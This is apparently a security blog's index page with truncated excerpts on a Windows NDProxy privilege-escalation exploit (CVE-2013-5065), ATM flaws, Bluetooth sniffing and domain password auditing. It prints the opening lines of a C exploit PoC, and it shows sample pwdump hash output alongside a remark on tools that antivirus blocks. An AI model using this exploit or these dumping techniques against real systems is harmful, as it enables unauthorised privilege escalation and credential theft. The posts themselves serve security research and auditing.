NDProxy Privilege Escalation (CVE-2013-5065)

Introduction: In the last few days everyone has been raving about CVE-2013-5065, a new Windows XP/2k3 privilege escalation, well documented by FireEye. Googling around, we came across a Twitter message which contained a link to a Chinese vulnerability analysis and PoC for CVE-2013-5065. Exploit PoC:

#include "windows.h"
#include "stdio.h"

void main(){
    // Open a handle to the NDProxy device (the device path must be escaped in a C string literal)
    HANDLE hdev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hdev == INVALID_HANDLE_VALUE) {
        printf("CreateFile Failed: %d\n", GetLastError());
    }
    DWORD InBuf[0x15] = {0};
    DWORD dwRetbytes…

ATM In-Security in 2013 | ATM Security Flaws & Vulnerabilities

Introduction: With the recent SecTor security conference in Toronto, Canada, ATM security flaws have once again risen to the top of the agenda. ATM flaws have become widespread knowledge since Barnaby Jack showed off his 'Jackpotting' attack. They have once again become a hot topic since the late Barnaby's death two weeks prior to this year's Black Hat conference (USA 2013), where he was going to present on pacemaker flaws. Barnaby…

Bluetooth Sniffing | Bluetooth Vulnerabilities | InteliSecure

After the previous post, Ubertooth – Open Source Bluetooth Sniffing, many have asked the question: why? People may remember some of the original Bluetooth holes from 2004-2008, but vulnerabilities are simply not common these days. A short list of vulnerabilities on phones: stealing address books from Nokia phones; remote dialling of 090* numbers; blasting audio down headsets/car stereos. Depending on the Bluetooth implementation, sometimes security and/or encryption is not applied. As…

Domain Password Audits | InteliSecure

Background: With anti-virus technology continuing to block auditing/hacking tools like pwdump/fgdump, auditing passwords on a domain is becoming increasingly difficult. In a series of recent audits it has been challenging to extract the domain hashes: using familiar tools like pwdump against the Windows Security Accounts Manager (SAM) surprisingly reveals only two accounts, where we would expect a long list of domain hashes. Example output:

Administrator:500:3CED43EE2B6F79553F211111D2509C89:2A39F8C2138329F953111D035C1E99AB:::
Guest:501:C5C111117DB4E3E7C1E86A266265BCA9:F6B11111D3531AA18821F8B087AE2610:::

These…